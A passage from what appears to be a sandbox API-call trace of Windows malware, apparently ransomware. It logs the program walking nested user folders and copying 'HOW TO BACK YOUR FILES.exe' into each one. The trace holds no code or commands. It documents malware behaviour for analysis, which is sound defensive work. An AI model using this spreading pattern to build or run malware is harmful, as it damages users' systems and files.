lpOverlapped=0x0) returned 1 [0065.968] CloseHandle (hObject=0x154) returned 1 [0065.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.969] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.969] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.969] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.969] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media" [0065.969] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.969] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.971] GetLastError () returned 0x0 [0065.971] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.971] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.971] CloseHandle (hObject=0x154) returned 1 [0065.971] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.971] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.971] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.971] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.971] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0" [0065.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.972] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.972] GetLastError () returned 0x0 [0065.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.972] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.972] CloseHandle (hObject=0x154) returned 1 [0065.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.973] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.973] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.973] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.973] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.973] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.973] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.973] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.974] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.974] GetLastError () returned 0x0 [0065.974] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.974] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.974] CloseHandle (hObject=0x154) returned 1 [0065.974] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.974] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.974] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.974] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.974] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.975] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.975] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.975] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.975] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.982] GetLastError () returned 0x0 [0065.982] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.982] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.982] CloseHandle (hObject=0x154) returned 1 [0065.982] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.982] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.982] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.982] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.983] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.983] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.983] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.983] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.983] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.984] GetLastError () returned 0x0 [0065.984] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.984] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.985] CloseHandle (hObject=0x154) returned 1 [0065.985] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.988] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.992] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.992] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.993] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.993] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.993] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.993] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.993] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.993] GetLastError () returned 0x0 [0065.994] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.994] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.994] CloseHandle (hObject=0x154) returned 1 [0065.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.994] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.994] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.994] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.994] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.994] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.994] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.994] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.995] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.995] GetLastError () returned 0x0 [0065.995] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.995] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.995] CloseHandle (hObject=0x154) returned 1 [0065.995] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.995] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.995] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.996] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.996] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.996] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.996] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.996] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.996] GetLastError () returned 0x0 [0065.996] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.996] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.997] CloseHandle (hObject=0x154) returned 1 [0065.997] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.997] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.997] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") 